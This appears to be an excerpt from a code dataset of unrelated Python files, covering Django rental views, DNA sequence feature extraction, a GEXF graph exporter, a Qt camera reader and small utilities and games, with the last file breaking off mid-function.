text stringlengths 8 6.05M |
|---|
def view_code(filename):
    """Print the contents of *filename* line by line, after asking the user (y/n)."""
    try:
        if input('показать исходный код задачи? [y/n]') == 'y':
            with open(filename, 'r', encoding='utf-8') as file:
                for line in file:
                    print(line.rstrip())
    except Exception:
        # BUG FIX: the original f-string had no placeholder and always printed
        # a literal placeholder instead of the actual filename; also narrowed
        # the bare except (it even swallowed KeyboardInterrupt).
        print(f'файл {filename} не существует или что-то сломалось')
|
# Plot the abundance evolution of selected species from a ppn run in the
# current directory and save it as abu_evolution.png.
import ppn
import utils
from matplotlib.pylab import *

symbs = utils.symbol_list('lines2')
x = ppn.xtime('.')
specs = ['PROT', 'HE 4', 'C 12', 'N 14', 'O 16']
# enumerate replaces the original manual i counter
for i, spec in enumerate(specs):
    x.plot('time', spec, logy=True, logx=True,
           shape=utils.linestyle(i)[0], show=False, title='')
ylim(-5, 0.2)
legend(loc=0)
# BUG FIX: raw strings — '\m' in the originals is an invalid escape sequence
# (DeprecationWarning today, SyntaxError in future Python versions).
xlabel(r'$\log t / \mathrm{min}$')
ylabel(r'$\log X \mathrm{[mass fraction]}$')
savefig('abu_evolution.png')
|
from django.contrib.auth.models import Group
from django.shortcuts import render, redirect
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import auth
from .models import Cars, Bikes, Order
from .forms import RegisterForm, CustomerProfileForm, CarUploadForm, OrderForm, BikeUploadForm
from .decorators import unauthenticated_customer, allowed_users,unauthenticated_client
# Create your views here.
@unauthenticated_customer
def customer_login(request):
    """Authenticate a customer; redirect home on success, back to login on failure."""
    if request.method == 'POST':
        # .get() avoids a KeyError (HTTP 500) when a field is missing from the post
        username = request.POST.get('username')
        password = request.POST.get('password')
        user = auth.authenticate(request, username=username, password=password)
        if user is not None:
            auth.login(request, user)
            return redirect('/')
        # invalid credentials: back to the login page
        return redirect('login')
    return render(request, 'account/login.html')
@unauthenticated_customer
def customer_register(request):
    """Register a customer: create the auth user + profile, add to the 'customer' group."""
    if request.method == 'POST':
        # BUG FIX: the original also tested request.method == 'FILES' ('FILES'
        # is not an HTTP method) and, on GET, bound request.POST/request.FILES
        # into the forms, which marks empty forms as submitted-and-invalid.
        form = RegisterForm(request.POST)
        profile_form = CustomerProfileForm(request.POST, request.FILES)
        if form.is_valid() and profile_form.is_valid():
            user = form.save()
            profile = profile_form.save(commit=False)
            profile.user = user
            # membership in the 'customer' group drives the @allowed_users checks
            group = Group.objects.get(name='customer')
            user.groups.add(group)
            profile.save()
            return redirect('/account/customer_login')
    else:
        # GET: render unbound forms
        form = RegisterForm()
        profile_form = CustomerProfileForm()
    return render(request, 'account/register.html',
                  {'form': form, 'customer_profile_form': profile_form})
@login_required()
def customer_logout(request):
    """Log the current user out and send them to the landing page."""
    auth.logout(request)
    return redirect('/')
@unauthenticated_client
def client_login(request):
    """Authenticate a client; on success go to their dashboard, otherwise retry."""
    if request.method == 'POST':
        # .get() avoids a KeyError (HTTP 500) when a field is missing from the post
        username = request.POST.get('username')
        password = request.POST.get('password')
        user = auth.authenticate(request, username=username, password=password)
        if user is not None:
            auth.login(request, user)
            return redirect('client_dashboard')
        return redirect('client_login')
    return render(request, 'account/client_login.html')
@login_required()
@allowed_users(allowed_roles=['client'])
def client_dashboard(request):
    """Client dashboard: the vehicles they uploaded plus the orders placed on them."""
    owner = request.user
    cars = Cars.objects.filter(uploaded_by=owner)
    bikes = Bikes.objects.filter(uploaded_by=owner)
    context = {
        'profile': owner,
        'car': cars,
        'bike': bikes,
        'car_order': Order.objects.filter(car__in=cars),
        'bike_order': Order.objects.filter(bike__in=bikes),
    }
    return render(request, 'account/client_dashboard.html', context)
@login_required()
def client_logout(request):
    """Log the client out and return them to the client login page."""
    auth.logout(request)
    return redirect('/account/client_login/')
@login_required()
@allowed_users(allowed_roles=['client'])
def upload_car(request):
    """Let a client upload a new car; the record is stamped with the uploader."""
    # BUG FIX: the original assigned the form *class* (CarUploadForm) instead of
    # an instance, and tested request.method == 'FILES' ('FILES' is not an
    # HTTP method).
    car = CarUploadForm()
    if request.method == 'POST':
        car = CarUploadForm(request.POST, request.FILES)
        if car.is_valid():
            obj = car.save(commit=False)
            obj.uploaded_by = request.user  # ownership drives dashboard filtering
            obj.save()
            return redirect('client_dashboard')
    return render(request, 'account/upload_car.html', {'car': car})
@login_required()
@allowed_users(allowed_roles=['client'])
def upload_bike(request):
    """Let a client upload a new bike; the record is stamped with the uploader."""
    # BUG FIX: instantiate the form (the original bound the class itself) and
    # drop the bogus request.method == 'FILES' test.
    bike = BikeUploadForm()
    if request.method == 'POST':
        bike = BikeUploadForm(request.POST, request.FILES)
        if bike.is_valid():
            obj = bike.save(commit=False)
            obj.uploaded_by = request.user  # ownership drives dashboard filtering
            obj.save()
            return redirect('/account/client_dashboard/')
    return render(request, 'account/bike_upload.html', {'bike': bike})
@login_required()
@allowed_users(allowed_roles=['customer'])
def rent_car(request, id):
    """Show (GET) and process (POST) the rental order form for car *id*."""
    # long-lived session so the chosen car id survives the form round-trip
    request.session.set_expiry(12000000)
    request.session['id'] = id
    car = Cars.objects.get(id=request.session['id'])
    # BUG FIX: render an unbound form *instance* on GET (the original assigned
    # the OrderForm class itself).
    rent = OrderForm()
    if request.method == 'POST':
        rent = OrderForm(request.POST)
        if rent.is_valid():
            obj = rent.save(commit=False)
            obj.customer = request.user
            obj.car = car
            obj.save()
            return redirect('/')
    return render(request, 'account/order_form.html', {'form': rent, 'obj': car})
@login_required()
@allowed_users(allowed_roles=['customer'])
def rent_bike(request, id):
    """Show (GET) and process (POST) the rental order form for bike *id*."""
    # long-lived session so the chosen bike id survives the form round-trip
    request.session.set_expiry(12000000)
    request.session['id'] = id
    bike = Bikes.objects.get(id=request.session['id'])
    # BUG FIX: render an unbound form *instance* on GET (the original assigned
    # the OrderForm class itself).
    rent = OrderForm()
    if request.method == 'POST':
        rent = OrderForm(request.POST)
        if rent.is_valid():
            obj = rent.save(commit=False)
            obj.customer = request.user
            obj.bike = bike
            obj.save()
            return redirect('/')
    return render(request, 'account/order_form.html', {'form': rent, 'obj': bike})
@login_required()
@allowed_users(allowed_roles=['client'])
def carview(request):
    """List every car uploaded by the logged-in client."""
    cars = Cars.objects.filter(uploaded_by=request.user)
    return render(request, 'account/car_list.html', {'car': cars})
@login_required()
@allowed_users(allowed_roles=['client'])
def bikeview(request):
    """List every bike uploaded by the logged-in client."""
    bikes = Bikes.objects.filter(uploaded_by=request.user)
    return render(request, 'account/bike_list.html', {'bike': bikes})
@login_required()
@allowed_users(allowed_roles=['client'])
def edit_car(request, id):
    """Edit an existing car through the same form used for uploads."""
    obj = Cars.objects.get(id=id)
    car = CarUploadForm(instance=obj)
    # BUG FIX: dropped the bogus request.method == 'FILES' test
    # ('FILES' is not an HTTP method)
    if request.method == 'POST':
        car = CarUploadForm(request.POST, request.FILES, instance=obj)
        if car.is_valid():
            car.save()
            return redirect('client_dashboard')
    return render(request, 'account/upload_car.html', {'car': car})
@login_required()
@allowed_users(allowed_roles=['client'])
def delete_car(request, id):
    """Confirm (GET) then delete (POST) the car with primary key *id*."""
    car = Cars.objects.get(id=id)
    if request.method != 'POST':
        return render(request, 'account/delete.html', {'object': car})
    car.delete()
    return redirect('client_dashboard')
@login_required()
@allowed_users(allowed_roles=['client'])
def edit_bike(request, pk):
    """Edit an existing bike through the same form used for uploads."""
    obj = Bikes.objects.get(id=pk)
    bike = BikeUploadForm(instance=obj)
    # BUG FIX: dropped the bogus request.method == 'FILES' test
    # ('FILES' is not an HTTP method)
    if request.method == 'POST':
        bike = BikeUploadForm(request.POST, request.FILES, instance=obj)
        if bike.is_valid():
            bike.save()
            return redirect('client_dashboard')
    return render(request, 'account/bike_upload.html', {'bike': bike})
@login_required()
@allowed_users(allowed_roles=['client'])
def delete_bike(request, id):
    """Confirm (GET) then delete (POST) the bike with primary key *id*."""
    bike = Bikes.objects.get(id=id)
    if request.method != 'POST':
        return render(request, 'account/delete.html', {'object': bike})
    bike.delete()
    return redirect('client_dashboard')
@login_required()
@allowed_users(allowed_roles=['client'])
def confirm_booking(request, id):
    """Mark an order as Confirmed once the client approves it (POST)."""
    obj = Order.objects.get(id=id)
    if request.method == 'POST':
        # the order was already fetched above; the original re-queried it here
        obj.status = 'Confirmed'
        obj.save()
        return redirect('client_dashboard')
    return render(request, 'account/delete.html', {'object': obj})
@login_required()
@allowed_users(allowed_roles=['client'])
def delete_booking(request, id):
    """Confirm (GET) then delete (POST) the order with primary key *id*."""
    booking = Order.objects.get(id=id)
    if request.method != 'POST':
        return render(request, 'account/delete.html', {'object': booking})
    booking.delete()
    return redirect('client_dashboard')
@login_required()
@allowed_users(allowed_roles=['client'])
def booking_detail(request):
    """Booking overview for a client: their vehicles and the orders on them."""
    owner = request.user
    cars = Cars.objects.filter(uploaded_by=owner)
    bikes = Bikes.objects.filter(uploaded_by=owner)
    context = {
        'profile': owner,
        'car': cars,
        'bike': bikes,
        'car_order': Order.objects.filter(car__in=cars),
        'bike_order': Order.objects.filter(bike__in=bikes),
    }
    return render(request, 'account/booking_detail.html', context)
|
class Bai_6():
    """Exercise 6: read a line from stdin and print it upper-cased."""

    # class-level defaults, kept for backward compatibility with the original API
    String1 = ''
    String2 = ''
    Numberx = 0

    def __init__(self, string1='', string2='', numberx=''):
        """Store both strings and the number on the instance."""
        self.Numberx = numberx
        self.String1 = string1
        self.String2 = string2

    def getString(self):
        """Read one line from stdin into String2."""
        self.String2 = input()

    def printString(self):
        """Print String2 converted to upper case."""
        print(self.String2.upper())
# Demo driver: read one line from stdin and echo it upper-cased.
Bai6 = Bai_6()
Bai6.getString()
Bai6.printString()
import cv2
import threading
from PyQt5.QtCore import pyqtSlot, pyqtSignal,QTimer, QDateTime,Qt, QObject
from PyQt5.QtGui import QPixmap,QColor
from PyQt5 import QtCore, QtGui
import time
# Module-wide capture device shared by all GetImageFromCamera instances;
# index 0 is the default system camera.
Camera_Number = 0
Camera_Object = cv2.VideoCapture(Camera_Number)
class GetImageFromCamera(QObject):
    """Periodically grabs frames from the shared camera and paints them on a label.

    A QTimer fires every 50 ms; each tick spawns a short-lived daemon thread
    that reads one frame, converts BGR->RGB, wraps it in a scaled QPixmap and
    sets it on *labelObject*.
    """

    def __init__(self, frameCut=((0, 640), (0, 480)), size=(280, 480), scale=0.3, time=50, labelObject=""):
        # NOTE(review): frameCut, scale and time are accepted but never used below.
        super().__init__()
        self.cameraObj = Camera_Object  # module-level shared cv2.VideoCapture
        self.timerReadImage = QTimer(self)
        self.timerReadImage.timeout.connect(self.__ThreadReadCamera)
        self.size = size                # (width, height) target for the scaled pixmap
        self.labelObject = labelObject  # widget receiving the pixmap (presumably a QLabel — confirm)

    def __ThreadReadCamera(self):
        # one daemon thread per timer tick keeps the GUI thread from blocking on read()
        threadReadCam = threading.Thread(target=self.__GetImageFromCamera, args=(), daemon=True)
        threadReadCam.start()

    def __GetImageFromCamera(self):
        global frame, frameNoFaceMark
        global FaceLocationInImage
        # global NumberFrameNotFace
        # while True:
        ret, frameFullSize = self.cameraObj.read()
        # OpenCV delivers BGR; Qt expects RGB
        rgbImage = cv2.cvtColor(frameFullSize, cv2.COLOR_BGR2RGB)
        convertToQtFormat = QtGui.QImage(rgbImage.data, rgbImage.shape[1], rgbImage.shape[0],
                                         QtGui.QImage.Format_RGB888)
        convertToQtFormat = QtGui.QPixmap.fromImage(convertToQtFormat)
        pixmap = QPixmap(convertToQtFormat)
        resizeImage = pixmap.scaled(self.size[0], self.size[1], QtCore.Qt.KeepAspectRatio)
        # self.PixmapFromCamera.emit(resizeImage)
        # time.sleep(0.05)
        # if(not self.toBeReadImage):
        # return
        # NOTE(review): this updates a Qt widget from a worker thread; Qt
        # expects GUI updates on the main thread — confirm this is intentional.
        self.labelObject.setPixmap(resizeImage)

    def StopReadImage(self):
        """Stop the frame-grab timer."""
        self.timerReadImage.stop()

    def StartReadImage(self):
        """Start grabbing one frame every 50 ms."""
        self.timerReadImage.start(50)
|
# Strip every emoji from a sample Persian sentence using the demoji package.
import demoji
import regex as re
# demoji.download_codes()  # one-time: fetch the emoji code table
text = u'منو فالو نمیکنید☹️☹️ یعنی یه دوووونه کامنت وجودره 🤦♀️ همه دنبال یه چیزی میگردن ،خاک برسرتون ،واقعا حت ریده به ت تصویری با ۸۵واقعی❤️'
new = demoji.replace(text, "")
print(new)
from django.db import models
from django.contrib.auth.models import AbstractUser
# Create your models here.
class CustomUser(AbstractUser):
    """Model definition for CustomUser.

    Thin extension of Django's AbstractUser; exists so extra fields can be
    added later without a painful user-model migration.
    """
    class Meta:
        verbose_name_plural = 'CustomUsers'

    def __str__(self):
        # shown in the admin and anywhere the user is rendered as text
        return self.username
class DNAAttributeConstruction:
    '''Parent class for DNA translation and feature initialization.'''

    def __init__(self, sequence_data, labels=None, list_indices=None, chunk=True):
        '''Takes whole string{-id, -lab} or list(strings){+/- id, +lab}. generates frags, frag_id, labels'''
        self.peptides = None  # sentinel checked by zip_all(); set by decode_dna()
        # accepts a single 'master' sequence: split into stop-delimited frames
        if isinstance(sequence_data, str):
            self.seq = sequence_data.upper()
            self.fragments, self.frag_index = fragment_stop_delimited(self.seq)
        # or a pre-split list of fragments WITH LABELS. If no indicies provided, [0]*n used.
        elif isinstance(sequence_data, list):
            self.fragments = [seq.upper() for seq in sequence_data]
            if list_indices:
                self.frag_index = list_indices
            else:
                self.frag_index = [0]*len(self.fragments)
        if chunk:
            # Re-window fragments into fixed-size chunks.
            # If seq_data == str, NO LABELS. intended for accessory functionality only.
            self.fragments, self.frag_index, self.labels = fragment_windowed(
                zip(self.fragments, self.frag_index,
                    labels if labels is not None else [None]*len(self.fragments)))

    def decode_dna(self, lookup):
        '''Translate each DNA fragment; compile derived per-codon AA features.

        lookup: codon -> row dict with keys 'aa', 'f_aa', 'r_aa',
        'hydrophob_7', 'aromatic', 'class' (see codon_lookup()).
        '''
        self.peptides = []
        self.peptide_id = []
        self.codon_pref = []
        self.aa_hydrophob = []
        self.aa_aromatic = []
        self.aa_class = []
        for j, seq in enumerate(self.fragments):
            prot = ''
            pid, pref, aa_h, aa_a, aa_c = [], [], [], [], []
            for i in range(0, len(seq), 3):  # one codon at a time
                entry = lookup[seq[i:i+3]]
                prot += entry['aa']
                # add'nl properties:
                # pid.append(self.frag_index[j])
                pref.append(entry['f_aa']/entry['r_aa'])  # codon preference ratio
                aa_h.append(entry['hydrophob_7'])
                aa_a.append(entry['aromatic'])
                aa_c.append(entry['class'])
            self.peptides.append(prot)
            # self.peptide_id.append(pid)
            self.codon_pref.append(pref)
            self.aa_hydrophob.append(aa_h)
            self.aa_aromatic.append(aa_a)
            self.aa_class.append(aa_c)
        return self  # fluent: allows ...decode_dna(lookup).zip_all()

    def zip_all(self):
        '''Per peptide, a list of (amino_acid, codon_pref, hydrophob, aromatic, class) tuples.'''
        if self.peptides is None:
            # NOTE(review): prints instead of raising and falls through to
            # return None in this case
            print('AttributeError: Nice try. You have to decode the DNA first.')
        else:
            return [list(zip(aa, pref, aah, aaa, aac))
                    for aa, pref, aah, aaa, aac
                    in zip(self.peptides, self.codon_pref, self.aa_hydrophob,
                           self.aa_aromatic, self.aa_class)]
# DNAFeatureExtraction accessory function
import re
from collections import defaultdict

def fragment_stop_delimited(seq):
    '''Find/split all possible stop-delimited coding frames.

    Scans for stop codons (TAA/TAG/TGA), assigns each to its reading frame,
    and cuts that frame's running sequence at the stop. Tail remainders are
    trimmed to whole codons. Aggregates all three frames into a single list.
    Returns (sequences, global start indices).
    '''
    frames = [0, 1, 2]  # the three reading frames
    stops_reg = re.compile('|'.join(['TAA', 'TAG', 'TGA']))  # define stops
    elements = defaultdict(list)   # frame -> fragment strings
    indicies = defaultdict(list)   # frame -> fragment start offsets
    idx = {0: 0, 1: 1, 2: 2}       # per-frame index of the current fragment start
    # progressively search for stop codons, increment result vectors by frame
    i = 0
    while i < len(seq):
        x = re.search(stops_reg, seq[i:])  # find next stop at/after i
        if x:
            frame = (x.start()+i) % 3              # establish frame of this stop
            sequence = seq[idx[frame]:x.end()+i]   # grab sequence from previous frame end
            # print(frame, x.group(), sequence)
            elements[frame].append(sequence)
            indicies[frame].append(idx[frame])
            idx[frame] = x.end()+i  # update frame start index (just past the stop)
            # resume 2 bases before the furthest cut — presumably so stops
            # overlapping the boundary in other frames aren't missed (verify)
            i = max(idx.values())-2
        else:  # cap all vectors with the remaining non-stopped sequence
            for x in frames:
                sequence = seq[idx[x]:]
                elements[x].append(sequence[:len(sequence)-(len(sequence) % 3)])  # trim to full codons
                indicies[x].append(idx[x])
            break
    # aggregate the per-frame vectors to a single flat list
    fragments = [x for frame in elements.values() for x in frame]
    frag_index = [x for frame in indicies.values() for x in frame]  # global index
    return fragments, frag_index
# DNAFeatureExtraction accessory function
def fragment_windowed(seqs_idx, window=150, offset=60):
'''takes list of tuple(aa_sequence,index) and returns lists of windows & updated indicies'''
chunked = [(frag[idn:idn+window], (idg,idg+idn), lab) for frag,idg,lab in seqs_idx for idn in range((len(frag)-window)%offset, len(frag)-window+1, offset)]
windows, wind_index, labels = list(zip(*chunked))
return list(windows), list(wind_index), list(labels)
def reverse_complement(seq):
    """Return the reverse complement of a DNA string (A<->T, C<->G)."""
    pairing = {'A': 'T', 'C': 'G', 'G': 'C', 'T': 'A'}
    return ''.join(pairing[base] for base in reversed(seq))
import numpy as np
import pandas as pd

def codon_prefs(seq, w=None, lookup=None):
    '''Calculate preference scores (f_aa/r_aa) for ALL codon positions of *seq*.

    Scores are grouped by reading frame (columns 0..2 of the returned
    DataFrame) and truncated to the shortest frame. If *w* is an int, a
    centered rolling geometric mean of width *w* is applied (the probability
    score from the 1983 paper).

    lookup: codon -> {'f_aa': ..., 'r_aa': ...} table. BUG FIX: the original
    silently relied on a module-level ``lookup`` global that only exists after
    the caller ran codon_lookup(); it is now an explicit parameter, falling
    back to the global for backward compatibility.
    '''
    if lookup is None:
        lookup = globals()['lookup']  # legacy behaviour: module-level table
    scores = []
    for i in range(len(seq)):
        codon = seq[i:i+3]
        if len(codon) == 3:
            entry = lookup[codon]
            scores.append(entry['f_aa']/entry['r_aa'])
    # group by reading frame and truncate to the shortest frame length
    rf_scores = {j: scores[j::3] for j in (0, 1, 2)}
    lmin = min(len(v) for v in rf_scores.values())
    rf_scores = {j: v[:lmin] for j, v in rf_scores.items()}
    # cast to dataframe (one column per frame)
    df = pd.DataFrame.from_dict(rf_scores)
    # calculate rolling probability score
    if isinstance(w, int):
        df = df.rolling(window=w, center=True).apply(lambda x: np.exp(sum(np.log(x))/w))  # from the 1983 paper
    return df
import pandas as pd

def codon_lookup(path='../data/CodonUsage_ecoli.csv', extrude_=None):
    '''Import the codon-usage CSV as both a pd.DataFrame and a per-codon dict.

    Returns (codons, lookup) where lookup maps codon -> row dict. When
    *extrude_* is truthy, an extra 'f_mod' column of extruded (sharpened)
    per-AA frequencies is added via the extrude() helper.
    '''
    codons = pd.read_csv(path).set_index('codon')
    if extrude_:
        reweighted = codons.groupby('aa').f_aa.apply(extrude, k=extrude_)
        codons['f_mod'] = [p for group in reweighted for p in group]
    # print(codons.head(5))
    return codons, codons.to_dict(orient='index')
def seq_merge(seqs):
    '''Merge a pre-ordered list of overlapping windows back into one string.

    The overlap length is measured between the first two windows (longest
    proper prefix of the second found anywhere in the first) and assumed
    constant for all subsequent windows.
    '''
    seqs = list(seqs)
    merged = seqs[0]
    if len(seqs) > 1:
        overlap = 0
        for n in range(1, len(seqs[1])):
            if seqs[1][:n] in merged:
                overlap = n
        tails = [s[overlap:] for s in seqs[1:]]
        merged = merged + ''.join(tails)
    return merged
# accessory function for codon_lookup. not generally used.
def extrude(y, k=4):
    """Sharpen a weight vector: raise (w + 0.5) to the k-th power, then renormalize."""
    raised = [(w + .5) ** k for w in y]
    total = sum(raised)
    return [w / total for w in raised]
## ACCESSORY STATPACK FUNCTIONS
def zerocross_pack(X):  # intended for hydrophob array
    '''Distribution features of sign changes in a 1-D numeric sequence.

    Returns a (5,) np.array: crossing density, then mean/std/5th/95th
    percentile of the gaps between consecutive zero crossings
    (zeros when there are fewer than 3 crossings).
    '''
    crossings = [k for k in range(1, len(X)) if X[k] * X[k - 1] < 0]
    if len(crossings) <= 2:
        return np.hstack([1 / len(X), 0, 0, 0, 0])
    gaps = np.ediff1d(crossings)
    return np.hstack([len(crossings) / len(X),
                      gaps.mean(), gaps.std(),
                      np.percentile(gaps, 5), np.percentile(gaps, 95)])
def codon_bias_rms(X, lookup, AAs, select='FULL'):
    '''RMS of codon bias (f_aa - r_aa) over the codons of DNA sequence *X*.

    select='ALL'  -> single RMS over all codons
    select='FULL' -> overall RMS followed by per-AA RMS for *AAs*, shape (1+len(AAs),)
    select=<aa>   -> RMS over that amino acid's codons only (0. if absent)
    '''
    # (aa, bias) per codon
    x = [(lookup[X[i:i + 3]]['aa'], lookup[X[i:i + 3]]['f_aa'] - lookup[X[i:i + 3]]['r_aa'])
         for i in range(0, len(X), 3)]
    if select == 'ALL':
        return (sum([z[1] ** 2 for z in x]) / len(x)) ** .5
    elif select == 'FULL':
        df = pd.DataFrame(x)
        values = df[1].groupby(df[0]).apply(lambda v: (sum(v ** 2) / len(v)) ** .5)
        return np.hstack([(sum([z[1] ** 2 for z in x]) / len(x)) ** .5, values[AAs].fillna(0)])
    else:
        tmp = [z[1] ** 2 for z in x if z[0] == select]
        # BUG FIX: the original returned the *mean square* here, omitting the
        # square root that the docstring and the other two branches apply.
        return (sum(tmp) / len(tmp)) ** .5 if len(tmp) > 0 else 0.
def aa_pack(X, AAs):  # distribution of individual amino acids
    '''Positional-distribution features for each amino acid in *AAs*.

    Per AA: [frequency, mean gap, gap std, 5th, 95th percentile of the gaps
    between successive occurrences]; zeros when the AA appears < 3 times.
    Returns a (5*len(AAs),) np.array (100 features for the standard 20 AAs).
    '''
    L = len(X)
    feats = []
    for aa in AAs:
        positions = [pos for pos, char in enumerate(X) if char == aa]
        if len(positions) > 2:
            gaps = np.ediff1d(positions)
            feats.append([len(positions) / L, gaps.mean(), gaps.std(),
                          np.percentile(gaps, 5), np.percentile(gaps, 95)])
        else:
            feats.append([len(positions) / L, 0, 0, 0, 0])
    return np.hstack(feats)
def class_pack(X):
    '''Distribution features of amino-acid class positions.

    Runs statpack1 over the occurrence positions of each of the four AA
    classes in X and concatenates the results into a (32,) np.array.
    '''
    packed = []
    for cls in ('polar', 'nonpolar', 'basic', 'acidic'):
        positions = np.array([i for i, label in enumerate(X) if label == cls])
        packed.append(statpack1(positions))
    return np.hstack(packed)
def statpack1(X):
    '''(8,) distribution features of a numeric array: mean/std/5th/95th of
    the values and of the gaps between consecutive values; zeros if len < 2.'''
    if len(X) <= 1:
        return np.zeros(8)
    gaps = np.ediff1d(X)
    return np.hstack([X.mean(), X.std(),
                      np.percentile(X, 5), np.percentile(X, 95),
                      gaps.mean(), gaps.std(),
                      np.percentile(gaps, 5), np.percentile(gaps, 95)])
def statpack2(X):
    '''(64,) distribution features of a 2-D array: statpack1 applied to the
    row- and column-wise mean/std/5th/95th summaries, both axes concatenated.'''
    parts = []
    for axis in (0, 1):
        parts.append(np.hstack([statpack1(X.mean(axis=axis)),
                                statpack1(X.std(axis=axis)),
                                statpack1(np.percentile(X, 5, axis=axis)),
                                statpack1(np.percentile(X, 95, axis=axis))]))
    return np.hstack(parts)
import datetime
import simplejson
class BaseConverter(object):
    """Base for graph exporters: holds the graph and provides HTML escaping.

    Python 2 module (uses basestring here and iteritems in subclasses).
    """

    # BUG FIX: the replacement column had been entity-decoded into identity
    # pairs (e.g. ('&', '&')), which made encode_html a no-op. Restored the
    # standard HTML entities; '&' must stay first so it isn't double-escaped.
    html_codes = (
        ('&', '&amp;'),
        ('<', '&lt;'),
        ('>', '&gt;'),
        ('"', '&quot;'),
        ("'", '&#39;'),
    )

    def __init__(self, graph):
        self.graph = graph

    def encode_html(self, value):
        """Escape HTML special characters in string values; pass others through."""
        if isinstance(value, basestring):
            for old, new in self.html_codes:
                value = value.replace(old, new)
        return value
class GEXFConverter(BaseConverter):
    """Converts a Sylva neo4j graph to GEXF 1.2 (Python 2 module: uses iteritems)."""

    # The %s placeholder is the last-modified date, substituted at export time.
    header = """<?xml version="1.0" encoding="UTF-8"?>
<gexf xmlns="http://www.gexf.net/1.2draft" xmlns:viz="http://www.gexf.net/1.2draft/viz" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.gexf.net/1.2draft http://www.gexf.net/1.2draft/gexf.xsd" version="1.2">
<meta lastmodifieddate="%s">
<creator>Sylva</creator>
<description>A Sylva exported file</description>
</meta>
<graph mode="static" defaultedgetype="directed">"""

    def _today(self):
        """Date string for the <meta> element, e.g. '2013-7-4'."""
        today = datetime.datetime.now()
        return "%s-%s-%s" % (today.year, today.month, today.day)

    def export(self):
        """Build and return the whole graph serialized as one GEXF string."""
        date = self._today()
        attribute_counter = 0
        node_attributes = {}  # property name -> numeric attribute id
        edge_attributes = {}
        nodes = ''
        for node in self.graph.nodes.all():
            nodes += """
<node id="%s" label="%s">
<attvalues>""" % (node.id, node.label)
            for key, value in node.properties.iteritems():
                if key not in node_attributes:
                    node_attributes[key] = attribute_counter
                    attribute_counter += 1
                nodes += """
<attvalue for="%s" value="%s"/>""" % (node_attributes[key],
                                      self.encode_html(value))
            nodes += """
</attvalues>
</node>"""
        attribute_counter = 0
        edges = ''
        for edge in self.graph.relationships.all():
            edges += """
<edge id="%s" source="%s" target="%s" label="%s">
<attvalues>""" % (edge.id, edge.source.id, edge.target.id, edge.label)
            for key, value in edge.properties.iteritems():
                if key not in edge_attributes:
                    edge_attributes[key] = attribute_counter
                    attribute_counter += 1
                edges += """
<attvalue for="%s" value="%s"/>""" % (edge_attributes[key],
                                      self.encode_html(value))
            edges += """
</attvalues>
</edge>"""
        node_attributes_xml = ''
        for key, value in node_attributes.iteritems():
            node_attributes_xml += """
<attribute id="%s" title="%s" type="string"/>""" % (value, key)
        edge_attributes_xml = ''
        for key, value in edge_attributes.iteritems():
            edge_attributes_xml += """
<attribute id="%s" title="%s" type="string"/>""" % (value, key)
        # BUG FIX: the original template had five %s slots but was handed six
        # values (TypeError: not all arguments converted during string
        # formatting). The date belongs inside the header, so fill it there.
        gephi_format = """%s
<attributes class="node">
%s
</attributes>
<attributes class="edge">
%s
</attributes>
<nodes>%s
</nodes>
<edges>%s
</edges>
</graph>
</gexf>""" % (self.header % date, node_attributes_xml,
              edge_attributes_xml, nodes, edges)
        return gephi_format

    def stream_export(self):
        """Yield the GEXF document incrementally (lower memory for big graphs).

        NOTE(review): attribute declarations are yielded *after* the
        nodes/edges sections, mirroring the original behaviour — strict GEXF
        expects them before.
        """
        # BUG FIX: the original yielded the raw header with an unfilled %s.
        yield self.header % self._today()
        # Nodes
        yield '<nodes>'
        attribute_counter = 0
        node_attributes = {}
        edge_attributes = {}
        for node in self.graph.nodes.iterator():
            node_text = """
<node id="%s" label="%s">
<attvalues>""" % (node.id, node.label)
            for key, value in node.properties.iteritems():
                if key not in node_attributes:
                    node_attributes[key] = attribute_counter
                    attribute_counter += 1
                node_text += """
<attvalue for="%s" value="%s"/>""" % (node_attributes[key],
                                      self.encode_html(value))
            node_text += """
</attvalues>
</node>"""
            yield node_text
        yield '</nodes><edges>'
        # Edges
        attribute_counter = 0
        for edge in self.graph.relationships.iterator():
            edge_text = """
<edge id="%s" source="%s" target="%s" label="%s">
<attvalues>""" % (edge.id, edge.source.id, edge.target.id, edge.label)
            for key, value in edge.properties.iteritems():
                if key not in edge_attributes:
                    edge_attributes[key] = attribute_counter
                    attribute_counter += 1
                # BUG FIX: was '=' — it overwrote the opening <edge> text and
                # all but the last attribute value; must append.
                edge_text += """
<attvalue for="%s" value="%s"/>""" % (edge_attributes[key],
                                      self.encode_html(value))
            edge_text += """
</attvalues>
</edge>"""
            yield edge_text
        yield """
</edges>
"""
        # Node attributes
        node_attributes_xml = ''
        for key, value in node_attributes.iteritems():
            node_attributes_xml += """
<attribute id="%s" title="%s" type="string"/>""" % (value, key)
        yield """
<attributes class="node">
%s
</attributes>
""" % (node_attributes_xml)
        # Edge attributes
        edge_attributes_xml = ''
        for key, value in edge_attributes.iteritems():
            edge_attributes_xml += """
<attribute id="%s" title="%s" type="string"/>""" % (value, key)
        yield """
<attributes class="edge">
%s
</attributes>
""" % (edge_attributes_xml)
        yield """
</graph>
</gexf>"""
|
# Interactive number-guessing game: the player narrows in on a secret number
# between 1 and 99 with "Too high!"/"Too low!" hints.
from random import randint
print("This is an interactive guessing game!")
print("You have to enter a number between 1 and 99 to find out the secret number.")
print("Type 'exit' to end the game.")
print("Good luck!\n")
number = randint(1, 99)
answer = 0   # last valid guess (0 = no guess yet)
attempt = 0  # count of numeric guesses made
while (answer != number):
    try:
        print("What's your guess between 1 and 99?")
        text = input(">> ")
        if (text == "exit"):
            print("Goodbye!")
            quit()
        answer = int(text)  # raises ValueError for non-numeric input
        attempt += 1
        if (answer > number):
            print("Too high!")
        elif (answer < number):
            print("Too low!")
    except ValueError:
        print("That's not a number.")
        answer = 0  # reset so garbage input can never end the loop
# Post-game messages — the loop only exits on a correct guess.
if (number == 42):
    print("The answer to the ultimate question of life, the universe and everything is 42.")
if (attempt == 1):
    print("Congratulations! You got it on your first try!")
else:
    print("Congratulations, you've got it!")
    print(f"You won in {attempt} attempts!")
|
import os
from pydub import AudioSegment
from subprocess import call
import youtubetomp3.core.utils as Utils
class Converter(object):
    """Converter from video to needed extension (Python 2 module: print statement).

    Shells out to ffmpeg to transcode a previously downloaded file into the
    requested audio/video format inside the user's directory.
    """
    def __init__(self, user):
        super(Converter, self).__init__()
        self.user = user  # owner; used by Utils to build per-user paths

    def convert(self, path, ext):
